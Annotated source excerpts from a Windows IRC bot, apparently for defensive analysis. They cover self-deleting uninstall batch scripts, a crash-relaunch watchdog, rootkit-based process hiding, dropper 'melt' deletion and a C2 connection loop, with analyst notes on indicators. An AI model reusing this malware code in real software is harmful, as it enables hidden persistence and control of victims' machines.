// uninstall (service variant): removes the bot's persistence entry, releases
// its instance mutex and, unless invoked from the update path, stops all
// worker threads and starts the self-erase step.
//
//   thread - when TRUE the thread kill and EraseMe() are skipped, so the
//            update thread and the freshly installed copy are left alone.
//   difbot - not referenced anywhere in this body.
//
// Analyst notes (host artifacts visible from this code):
//   * With NO_SERVICE undefined, persistence is a Windows service named by
//     `servicename` (value not shown here). Removal goes through the Service
//     Control Manager with SC_MANAGER_ALL_ACCESS / SERVICE_ALL_ACCESS, so it
//     only succeeds in an elevated context.
//   * Neither handle is checked or closed; what happens when the SCM or the
//     service cannot be opened depends on the f* wrappers, which are not
//     shown here.
//   * The f-prefixed calls are presumably dynamically resolved API pointers,
//     so static import tables may not list these functions. Confirm against
//     the loader code.
//   * NOTE(review): line breaks were lost on this page; the RegDelete call in
//     the #else branch is read as commented-out code.
void uninstall(BOOL thread/*=FALSE*/, BOOL difbot/*=FALSE*/)
{
#ifndef NO_SERVICE
    // Erase the service
    SC_HANDLE scm;
    SC_HANDLE service;
    scm = fOpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    service = fOpenService(scm, servicename, SERVICE_ALL_ACCESS);
    fDeleteService(service);
#else
    // RegDelete(runkey.hkey,runkey.subkey,runkey.name);
#endif
    ReleaseMutex(xetum); // release the mutex so it doesn't break the next bot if it uses the same one
    if (!thread) { // ^ so we don't kill the update thread or have the batch trying to erase the new bot
        // kill all threads
        killthreadall();
        // start the batch to erase the bot (EraseMe is defined elsewhere)
        EraseMe();
    }
    return;
}
// _except_handler: frame-based SEH handler used as a crash watchdog. On any
// exception that reaches it, the handler tears down networking and worker
// threads, relaunches the current executable as a new detached process, and
// terminates the faulting process.
//
// None of the four handler parameters is used to decide anything; only
// ContextRecord->Eax is written, and that write has no visible effect because
// the process exits before execution could resume.
//
// Analyst notes (behaviour a defender can observe):
//   * A process that starts a second copy of its own image (path taken from
//     GetModuleFileName) with a hidden window, DETACHED_PROCESS, handle
//     inheritance enabled and the system directory as working directory.
//     The parent exits roughly 100 ms later.
//   * Because the relaunch happens on every fault, terminating or crashing
//     the process through an exception does not stop it; containment has to
//     address the image on disk and its persistence entry as well.
//   * fWSACleanup() is called twice, and the final `return` is unreachable
//     after ExitProcess(0).
//   * NOTE(review): `cdecl` appears without leading underscores on this page;
//     presumably `__cdecl` or a project macro. Confirm.
EXCEPTION_DISPOSITION cdecl _except_handler(struct _EXCEPTION_RECORD *ExceptionRecord, void *EstablisherFrame,struct _CONTEXT *ContextRecord,void *DispatcherContext)
{
    // do some clean-up: drop the main thread's socket, stop workers, unload Winsock
    fclosesocket(threads[0].sock);
    killthreadall();
    fWSACleanup();
    fWSACleanup();
    Sleep(100);

    PROCESS_INFORMATION pinfo;
    STARTUPINFO sinfo;
    memset(&pinfo, 0, sizeof(pinfo));
    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.lpTitle = "";
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = STARTF_USESHOWWINDOW;
    // The replacement process is visible only in DEBUG_CONSOLE builds.
#ifdef DEBUG_CONSOLE
    sinfo.wShowWindow = SW_SHOW;
#else
    sinfo.wShowWindow = SW_HIDE;
#endif

    char botfile[MAX_PATH],sysdir[MAX_PATH];
    GetSystemDirectory(sysdir, sizeof(sysdir));
    GetModuleFileName(NULL, botfile, sizeof(botfile));

    // Relaunch our own image; the working directory is the system directory.
    if (CreateProcess(NULL, botfile, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
        Sleep(100);
        CloseHandle(pinfo.hProcess);
        CloseHandle(pinfo.hThread);
    }

    // Change EAX in the context record so that it points to someplace
    // where we can successfully write
    ContextRecord->Eax = (DWORD)&scratch;

    _asm
    {                       // Remove our EXCEPTION_REGISTRATION record
        mov eax,[ESP]       // Get pointer to previous record
        mov FS:[0], EAX     // Install previous record
        add esp, 8          // Clean our EXCEPTION_REGISTRATION off stack
    }

    ExitProcess(0);

    // Tell the OS to restart the faulting instruction
    // (never reached: ExitProcess above does not return)
    return ExceptionContinueExecution;
}
// uninstall (batch-file variant): stops all worker threads, then removes the
// running executable from disk by writing a small batch script to the temp
// directory and running it through the command interpreter.
//
// Takes no parameters and returns nothing. If the batch file cannot be
// created, the function returns without attempting the delete.
//
// Analyst notes (host artifacts visible from this code):
//   * File: "del.bat" created in the directory returned by GetTempPath. The
//     script loops on `del "%1"` until the target is gone and then deletes
//     itself, so the file is short-lived; file-creation telemetry catches it,
//     a later disk triage usually will not.
//   * Process: the command line is built as `%comspec% /c <bat> <image>` and
//     expanded with ExpandEnvironmentStrings, giving a command interpreter
//     child whose arguments are a .bat in the temp directory followed by the
//     parent's own image path (both unquoted). It runs hidden, detached, at
//     below-normal priority.
//   * The image's file attributes are reset to FILE_ATTRIBUTE_NORMAL first,
//     so an attribute change on the image shortly precedes its deletion.
//   * AutoStartRegs() is called with no arguments when AutoStart is set and
//     advapi32 is available; presumably this removes the autostart registry
//     values. It is not shown here, so verify against its definition.
//   * Buffer handling is unchecked throughout: sprintf into MAX_PATH and
//     1024-byte buffers, and `f > (HANDLE)0` rather than a comparison with
//     INVALID_HANDLE_VALUE. Long temp or image paths make the behaviour
//     unpredictable.
void uninstall(void)
{
    char buffer[1024], cmdline[MAX_PATH], botfile[MAX_PATH], batfile[MAX_PATH];

    if ((AutoStart) && !(noadvapi32))
        AutoStartRegs();

    killthreadall();

    // Build "<temp dir>del.bat"; GetTempPath output ends with a backslash.
    GetTempPath(sizeof(buffer), buffer);
    sprintf(batfile, "%sdel.bat", buffer);

    HANDLE f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
    if (f > (HANDLE)0) {
        DWORD r;

        // Script body: retry deleting %1 until it no longer exists, then
        // delete the script itself.
        sprintf(buffer,"@echo off\r\n"
                       ":repeat\r\n"
                       "del \"%%1\"\r\n"
                       "if exist \"%%1\" goto repeat\r\n"
                       "del \"%s\"", batfile);
        WriteFile(f, buffer, strlen(buffer), &r, NULL);
        CloseHandle(f);

        PROCESS_INFORMATION pinfo;
        STARTUPINFO sinfo;
        memset(&pinfo, 0, sizeof(pinfo));
        memset(&sinfo, 0, sizeof(sinfo));
        sinfo.lpTitle = "";
        sinfo.cb = sizeof(sinfo);
        sinfo.dwFlags = STARTF_USESHOWWINDOW;
        sinfo.wShowWindow = SW_HIDE;

        // Clear read-only/hidden/system attributes so `del` can remove the image.
        GetModuleFileName(GetModuleHandle(NULL), botfile, sizeof(botfile));
        if (GetFileAttributes(botfile) != INVALID_FILE_ATTRIBUTES)
            SetFileAttributes(botfile,FILE_ATTRIBUTE_NORMAL);

        // Run the script with our own image path as %1.
        sprintf(buffer, "%%comspec%% /c %s %s", batfile, botfile);
        ExpandEnvironmentStrings(buffer, cmdline, sizeof(cmdline));

        CreateProcess(NULL, cmdline, NULL, NULL, TRUE, BELOW_NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
    }

    return;
}
// BotThread: main worker thread. It performs start-up housekeeping, launches
// the auxiliary threads enabled at build time, then loops connecting to the
// configured servers until the protocol object says to stop.
//
//   param - not referenced in this body.
//   The function ends with ExitThread(0); there is no return statement.
//
// Analyst notes (indicators and behaviour visible from this code; values held
// in variables such as mutexhandle, cononstart and servers[] are not shown):
//   * Named mutex: up to six CreateMutex attempts, 5 s apart, on the name in
//     `mutexhandle`. The name is a stable host indicator for a given build.
//   * "Melt" step (release builds): a file path read from the registry is
//     reset to normal attributes and deleted (up to 3 tries, 2 s apart), then
//     the registry value is removed. Presumably the path is the original
//     dropped copy; confirm against the installer code.
//   * Start-up HTTP request (release builds): one WinINet fetch of the URL in
//     `cononstart`, direct connection, no cache write. When the open fails,
//     the handles are closed and the read is still attempted on them.
//   * Process hiding (release builds): InitRK()/HideMe(). The original
//     comment names "fu", presumably the FU kernel driver; verify. A hidden
//     process will not appear in user-mode process listings, so driver-load
//     monitoring and cross-view comparison (handles, threads, network owners
//     against the process list) are the relevant checks.
//   * Registry: HKLM\SYSTEM\CurrentControlSet\Control\WaitToKillServiceTimeout
//     is set to "7000" in release builds.
//   * Network: the server list is walked round-robin with SFLOOD_DELAY
//     between iterations. The DNS cache is flushed before each connection
//     attempt unless NO_FLUSHDNS is defined. Nick, ident and real name are
//     generated per attempt; the object is presumably an IRC client, given
//     those field names.
//   * The local-IP lookup dereferences the gethostbyname result without a
//     NULL check, and strncpy may leave `inip` unterminated. A lookup failure
//     faults the thread.
DWORD WINAPI BotThread(LPVOID param)
{
    // Single-instance guard: retry creating the named mutex a few times.
    for (int m=0;m<6;m++) {
        if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle)))
            Sleep(5000);
        else
            break;
    }
    // if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT)
    //     ExitProcess(0);

    addthread(MAIN_THREAD,str_main_thread,main_title);

#ifndef _DEBUG
#ifndef NO_MELT
    // Delete the file named in the "melt" registry value, then the value itself.
    char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name);
    if (melt) {
        SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL);
        int tries=0;
        while (FileExists(melt) && tries<3) {
            DeleteFile(melt);
            tries++;
            Sleep(2000);
        }
        RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name);
    }
#endif // NO_MELT
#endif // _DEBUG

    srand(GetTickCount());
    dwstarted=GetTickCount();

#ifndef NO_VERSION_REPLY
    // Pick a random entry of versionlist for this run.
    curversion=rand()%(versionsize);
#ifdef _DEBUG
    printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]);
#endif
#endif

    WSADATA wsadata;
    if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
        ExitProcess(-2);

#ifndef _DEBUG
#ifndef NO_FCONNECT
    // One-off HTTP fetch of `cononstart`; the response bytes are not used.
    char readbuf[1024];
    HINTERNET httpopen, openurl;
    DWORD read;
    httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
    openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL);
    if (!openurl) {
        fInternetCloseHandle(httpopen);
        fInternetCloseHandle(openurl);
    }
    // Runs even when the open above failed.
    fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read);
    fInternetCloseHandle(httpopen);
    fInternetCloseHandle(openurl);
#endif // NO_FCONNECT
#endif // _DEBUG

#ifndef NO_INSTALLED_TIME
    if (!noadvapi32)
        GetInstalledTime();
    else
        sprintf(installedt,"Error");
#endif // NO_INSTALLED_TIME

    int i=0;
    DWORD id=0;

#ifndef NO_RECORD_UPTIME
    i=addthread(RUPTIME_THREAD,str_rup_thread,main_title);
    threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id);
#endif // NO_RECORD_UPTIME

#ifndef NO_AUTO_SECURE
#ifndef NO_SECURE
    // `secure` lives on this thread's stack and is handed to SecureThread by
    // pointer; it stays valid for as long as this function is running.
    NTHREAD secure;
    secure.bdata2=TRUE;//loop
    i=addthread(SECURE_THREAD,str_asecure_thread,sec_title);
    threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id);
#endif
#endif // NO_AUTO_SECURE

#ifndef NO_RDRIV
#ifndef _DEBUG
    rkenabled=InitRK();//initialize fu
    if (rkenabled)
        HideMe();//hide the process
#endif // _DEBUG
#endif // NO_RDRIV

#ifndef _DEBUG
    // maybe this will give the shutdown handler time to work
    RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000");
#endif

    //get internal ip
    char *ip;
    char hostname[256];
    struct hostent *h;
    fgethostname(hostname, 256);
    h = fgethostbyname(hostname);
    // No NULL check on h; only the first address in the list is used.
    ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
    strncpy(inip,ip,sizeof(inip));

    curserver=0;
    HookProtocol(&mainirc);

    // Connection loop: one server per iteration, wrapping at the end of the list.
    while (mainirc.should_connect()) {
        if (!mainirc.is_connected())
        {
#ifdef _DEBUG
            printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port);
#endif
#ifndef NO_FLUSHDNS
            FlushDNSCache();
#endif
            mainirc.start(servers[curserver].host,servers[curserver].port,
                          mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
                          mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass);
            mainirc.message_loop();
        }
        else
            mainirc.message_loop();

        Sleep(SFLOOD_DELAY);

        if (curserver==(serversize-1))
            curserver=0;
        else
            curserver++;
    }

    // cleanup;
    killthreadall();
    fWSACleanup();
    ReleaseMutex(mutex);
    ExitThread(0);
}